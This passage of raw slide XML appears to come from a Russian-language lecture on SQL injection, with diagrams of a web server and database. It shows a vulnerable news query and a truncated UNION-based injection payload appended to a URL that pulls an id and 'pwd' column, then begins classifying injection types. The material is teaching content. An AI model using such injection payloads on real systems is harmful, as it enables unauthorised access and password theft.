          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="Shape 32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322" name="Shape 322"/>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Пример SQL injection</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="obsluga-server.jpg" id="324" name="Shape 324"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4129548" y="1517947"/>
            <a:ext cx="646858" cy="961770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="Shape 325"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3841401" y="1031250"/>
            <a:ext cx="17214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WEB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru"/>
              <a:t>Сервер</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="326" name="Shape 326"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1861607" y="2809475"/>
            <a:ext cx="3757993" cy="2304171"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Shape 327"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4688651" y="1750625"/>
            <a:ext cx="17214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1800">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="obsluga-server.jpg" id="328" name="Shape 328"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7558548" y="1517947"/>
            <a:ext cx="646859" cy="961770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Shape 329"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7499000" y="1031250"/>
            <a:ext cx="7518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СУБД</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="Shape 330"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491175" y="1606875"/>
            <a:ext cx="1638300"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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5462975" y="1911675"/>
            <a:ext cx="2036100"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 name="Shape 332"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3035075" y="2402850"/>
            <a:ext cx="36327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SELECT * FROM news WHERE id = 6329</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="333" name="Shape 333"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6894025" y="2959775"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{88F3BABE-EEB9-4215-B301-9E1A10BABE3D}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="678700"/>
                <a:gridCol w="678700"/>
                <a:gridCol w="678700"/>
              </a:tblGrid>
              <a:tr h="228150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru"/>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="B7B7B7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru"/>
                        <a:t>topic</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="B7B7B7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru"/>
                        <a:t>news</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="B7B7B7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="228150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru"/>
                        <a:t>6329</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru"/>
                        <a:t>News</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru"/>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="Shape 334"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2491175" y="2216475"/>
            <a:ext cx="1638300"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1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pic>
        <p:nvPicPr>
          <p:cNvPr descr="lJ5AfkLBb7.jpg" id="339" name="Shape 339"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="819900" y="1464874"/>
            <a:ext cx="1658250" cy="1218975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="2.JPG" id="340" name="Shape 340"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="Shape 34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342" name="Shape 342"/>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Пример SQL injection</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="Shape 344"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609975" y="1018625"/>
            <a:ext cx="3099900" cy="42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http://web/?id=6329</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>+union+select+id,pwd,0+from...</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="obsluga-server.jpg" id="345" name="Shape 345"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4129548" y="1517947"/>
            <a:ext cx="646858" cy="961770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Shape 346"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3841401" y="1031250"/>
            <a:ext cx="17214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WEB Сервер</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Shape 347"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4688651" y="1750625"/>
            <a:ext cx="17214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1800">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="obsluga-server.jpg" id="348" name="Shape 348"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7558548" y="1517947"/>
            <a:ext cx="646859" cy="961770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="Shape 349"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7499000" y="1031250"/>
            <a:ext cx="7518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СУБД</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="Shape 350"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491175" y="1606875"/>
            <a:ext cx="1638300"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 name="Shape 351"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5462975" y="1911675"/>
            <a:ext cx="2036100"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 name="Shape 352"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3035075" y="2402850"/>
            <a:ext cx="3632700" cy="1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SELECT * FROM news WHERE id = 6329 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union select id,pwd,0 from...</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="353" name="Shape 353"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6894025" y="2959775"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{88F3BABE-EEB9-4215-B301-9E1A10BABE3D}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="678700"/>
                <a:gridCol w="678700"/>
                <a:gridCol w="678700"/>
              </a:tblGrid>
              <a:tr h="228150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru"/>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="B7B7B7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru"/>
                        <a:t>topic</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="B7B7B7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru"/>
                        <a:t>news</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="B7B7B7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="228150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru"/>
                        <a:t>6329</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru"/>
                        <a:t>News</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru"/>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="228150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru"/>
                        <a:t>12345</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru"/>
                        <a:t>pwd</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru"/>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="354" name="Shape 354"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2491175" y="2216475"/>
            <a:ext cx="1638300" cy="15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Выделение_010.png" id="355" name="Shape 355"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2039500" y="3231775"/>
            <a:ext cx="3674152" cy="1858224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Выделение_013.png" id="356" name="Shape 356"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2039500" y="3297450"/>
            <a:ext cx="3674150" cy="1792550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="Shape 357"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632900" y="3690375"/>
            <a:ext cx="805800" cy="153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1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3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363" name="Shape 363"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364" name="Shape 364"/>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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030565" y="29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2400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Injection разделяют в зависимости от типа используемой СУБД и условий внедрения</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366" name="Shape 366"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584175" y="1371575"/>
            <a:ext cx="8415300" cy="19383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rgbClr val="222222"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="ru" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Уязвимый запрос может обрабатывать Insert, Update, Delete</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
